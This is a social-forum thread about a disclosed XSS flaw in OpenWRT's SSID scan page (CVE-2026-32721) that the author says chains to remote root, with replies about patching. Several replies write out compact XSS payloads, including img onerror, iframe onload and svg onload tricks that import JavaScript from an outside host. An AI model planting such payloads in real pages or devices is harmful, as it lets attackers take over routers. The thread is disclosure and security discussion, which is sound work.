Skip to content
  • Categories
  • Recent
  • Tags
  • Popular
  • World
  • Users
  • Groups
Skins
  • Light
  • Brite
  • Cerulean
  • Cosmo
  • Flatly
  • Journal
  • Litera
  • Lumen
  • Lux
  • Materia
  • Minty
  • Morph
  • Pulse
  • Sandstone
  • Simplex
  • Sketchy
  • Spacelab
  • United
  • Yeti
  • Zephyr
  • Dark
  • Cyborg
  • Darkly
  • Quartz
  • Slate
  • Solar
  • Superhero
  • Vapor

  • Default (Cyborg)
  • No Skin
Collapse
Brand Logo

CIRCLE WITH A DOT

  1. Home
  2. Uncategorized
  3. Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/CVE-2026-32721, fixed in 24.10.6 / 25.12.1

Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/CVE-2026-32721, fixed in 24.10.6 / 25.12.1

Scheduled Pinned Locked Moved Uncategorized
17 Posts 12 Posters 0 Views
  • Oldest to Newest
  • Newest to Oldest
  • Most Votes
Reply
  • Reply as topic
Log in to reply
This topic has been deleted. Only users with topic management privileges can see it.
  • lunareclipse@snug.moeL lunareclipse@snug.moe

    @sash hmmm I really need to update my router huh

    sash@hachyderm.ioS This user is from outside of this forum
    sash@hachyderm.ioS This user is from outside of this forum
    sash@hachyderm.io
    wrote last edited by
    #6

    @lunareclipse or just don't open that scan page 😉

    1 Reply Last reply
    0
    • R relay@relay.infosec.exchange shared this topic
    • sash@hachyderm.ioS sash@hachyderm.io

      Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾
      Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
      CVE-2026-32721, fixed in 24.10.6 / 25.12.1

      bafdyce@chaos.socialB This user is from outside of this forum
      bafdyce@chaos.socialB This user is from outside of this forum
      bafdyce@chaos.social
      wrote last edited by
      #7

      @sash TIL that this works:

      <a id=s href=//domain/x.js>
      <img src=x onerror=import(s)>

      This might come in handy in future pentests 🙂

      sash@hachyderm.ioS 1 Reply Last reply
      0
      • sash@hachyderm.ioS sash@hachyderm.io

        Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾
        Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
        CVE-2026-32721, fixed in 24.10.6 / 25.12.1

        j_r@social.jugendhacker.deJ This user is from outside of this forum
        j_r@social.jugendhacker.deJ This user is from outside of this forum
        j_r@social.jugendhacker.de
        wrote last edited by
        #8

        @sash wow looks like a lot of people are upgrading right now, judging by the ASU server stats 🫣

        1 Reply Last reply
        0
        • R relay@relay.an.exchange shared this topic
        • sash@hachyderm.ioS sash@hachyderm.io

          Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾
          Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
          CVE-2026-32721, fixed in 24.10.6 / 25.12.1

          shadowdancer@mstdn.socialS This user is from outside of this forum
          shadowdancer@mstdn.socialS This user is from outside of this forum
          shadowdancer@mstdn.social
          wrote last edited by
          #9

          @sash
          Thanks for the heads up! I frequent the forums but it's been a couple of days since my last visit so I missed this one. It seems the release was announced 17h ago.

          Now, if this was found in a commercial router firmware, how quickly would you guess there'd be a fix available?

          I'd say weeks, or maybe months.

          edit: hashtag for better reach #OpenWRT

          1 Reply Last reply
          0
          • sash@hachyderm.ioS sash@hachyderm.io

            Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾
            Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
            CVE-2026-32721, fixed in 24.10.6 / 25.12.1

            nicksilkey@hachyderm.ioN This user is from outside of this forum
            nicksilkey@hachyderm.ioN This user is from outside of this forum
            nicksilkey@hachyderm.io
            wrote last edited by
            #10

            @sash what a find. thanks for sharing, friend. ✌️💙

            1 Reply Last reply
            0
            • sash@hachyderm.ioS sash@hachyderm.io

              Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾
              Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
              CVE-2026-32721, fixed in 24.10.6 / 25.12.1

              uvok@woof.techU This user is from outside of this forum
              uvok@woof.techU This user is from outside of this forum
              uvok@woof.tech
              wrote last edited by
              #11

              @sash funny coincidence, I fixed the same class of bug at work recently

              sash@hachyderm.ioS 1 Reply Last reply
              0
              • uvok@woof.techU uvok@woof.tech

                @sash funny coincidence, I fixed the same class of bug at work recently

                sash@hachyderm.ioS This user is from outside of this forum
                sash@hachyderm.ioS This user is from outside of this forum
                sash@hachyderm.io
                wrote last edited by
                #12

                @uvok there's a lot of these, I've been playing with it a lot over the last year, and I have some more fun ones in my queue waiting for release 🙂

                1 Reply Last reply
                0
                • bafdyce@chaos.socialB bafdyce@chaos.social

                  @sash TIL that this works:

                  <a id=s href=//domain/x.js>
                  <img src=x onerror=import(s)>

                  This might come in handy in future pentests 🙂

                  sash@hachyderm.ioS This user is from outside of this forum
                  sash@hachyderm.ioS This user is from outside of this forum
                  sash@hachyderm.io
                  wrote last edited by
                  #13

                  @BafDyce Yeah that took me a bit of time to find. An alert(1) fits easy of course, but I have the most fun if I can show a full running exploitation to something practical 🙂

                  1 Reply Last reply
                  0
                  • sash@hachyderm.ioS sash@hachyderm.io

                    Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾
                    Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
                    CVE-2026-32721, fixed in 24.10.6 / 25.12.1

                    dgl@infosec.exchangeD This user is from outside of this forum
                    dgl@infosec.exchangeD This user is from outside of this forum
                    dgl@infosec.exchange
                    wrote last edited by
                    #14

                    @sash very cool find! I think it would be possible to fit it (just) in 32 characters with: <iframe onload=import('//d.cx')>

                    (That url works; d.cx is serving a hello world alert payload at the moment, it works with e.g. https://d.cx/~dgl/l.html but I haven't tried actually doing it with OpenWRT.)

                    dgl@infosec.exchangeD 1 Reply Last reply
                    0
                    • dgl@infosec.exchangeD dgl@infosec.exchange

                      @sash very cool find! I think it would be possible to fit it (just) in 32 characters with: <iframe onload=import('//d.cx')>

                      (That url works; d.cx is serving a hello world alert payload at the moment, it works with e.g. https://d.cx/~dgl/l.html but I haven't tried actually doing it with OpenWRT.)

                      dgl@infosec.exchangeD This user is from outside of this forum
                      dgl@infosec.exchangeD This user is from outside of this forum
                      dgl@infosec.exchange
                      wrote last edited by
                      #15

                      @sash this takes advantage of the fact (some?) browsers by default load a blank iframe, so it's fewer characters than <img src=x onerror=...>. Works in Chrome at least.

                      freddy@social.security.plumbingF 1 Reply Last reply
                      0
                      • dgl@infosec.exchangeD dgl@infosec.exchange

                        @sash this takes advantage of the fact (some?) browsers by default load a blank iframe, so it's fewer characters than <img src=x onerror=...>. Works in Chrome at least.

                        freddy@social.security.plumbingF This user is from outside of this forum
                        freddy@social.security.plumbingF This user is from outside of this forum
                        freddy@social.security.plumbing
                        wrote last edited by
                        #16

                        @dgl @sash `<svg onload>` works in every browser and is shorter :). But maybe you don’t want your PoC to depend on the goodwill of a third party. And not everyone has a short domain.

                        dgl@infosec.exchangeD 1 Reply Last reply
                        0
                        • freddy@social.security.plumbingF freddy@social.security.plumbing

                          @dgl @sash `<svg onload>` works in every browser and is shorter :). But maybe you don’t want your PoC to depend on the goodwill of a third party. And not everyone has a short domain.

                          dgl@infosec.exchangeD This user is from outside of this forum
                          dgl@infosec.exchangeD This user is from outside of this forum
                          dgl@infosec.exchange
                          wrote last edited by
                          #17

                          @freddy @sash interesting… https://developer.mozilla.org/en-US/docs/Web/API/SVGElement/load_event claims it doesn’t work in Firefox and references a 15 year old bug… but yes, that would get a few more characters 🙂

                          1 Reply Last reply
                          1
                          0
                          Reply
                          • Reply as topic
                          Log in to reply
                          • Oldest to Newest
                          • Newest to Oldest
                          • Most Votes


                          • Login

                          • Login or register to search.
                          • First post
                            Last post
                          0
                          • Categories
                          • Recent
                          • Tags
                          • Popular
                          • World
                          • Users
                          • Groups